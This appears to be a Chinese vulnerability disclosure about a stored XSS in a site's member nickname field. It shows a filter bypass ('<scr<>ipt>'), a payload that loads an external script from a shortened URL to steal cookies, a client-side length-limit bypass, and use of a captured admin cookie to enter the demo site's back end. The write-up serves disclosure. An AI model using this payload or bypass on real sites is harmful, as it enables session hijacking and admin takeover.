### 简要描述:
通过最新版存储型XSS,已成功劫持到管理员cookie,并成功登录到官方演示站后台
P.S.管理员用的电脑是:土豪MAC!
### 详细说明:
在会员中心-设置-昵称修改,发现已经过滤了`<script>`,但是发现只过滤了一层,于是将`<script>`写成`<scr<>ipt>`,保存后发现xss成功了
于是X入了这条语句,Jim叔叔`<scr<>ipt src=http://126.am/SlQop0></sc<>ript>`,发现文本框有长度限制,但是只是前台的一个限制,修改了一下html提交保存成功!
跳转到会员首页查看源代码
[<img src="https://images.seebug.org/upload/201402/21121228d0d14974d7b10af0e9b7183e29c9ca79.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/21121228d0d14974d7b10af0e9b7183e29c9ca79.jpg)
然后我添加了一首歌,在管理员审核的时候就劫持到了管理员的cookie
[<img src="https://images.seebug.org/upload/201402/211214471c1853f28519f94a5f736b0daf460fad.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/211214471c1853f28519f94a5f736b0daf460fad.jpg)
[<img src="https://images.seebug.org/upload/201402/21121735870b4302eae11742bc5b4df1401b94da.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/21121735870b4302eae11742bc5b4df1401b94da.jpg)
### 漏洞证明:
伪造成管理员的cookie后,成功登入歌曲管理后台
[<img src="https://images.seebug.org/upload/201402/211220560dcf1907871419a290b662e1c41e2451.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/211220560dcf1907871419a290b662e1c41e2451.jpg)
暂无评论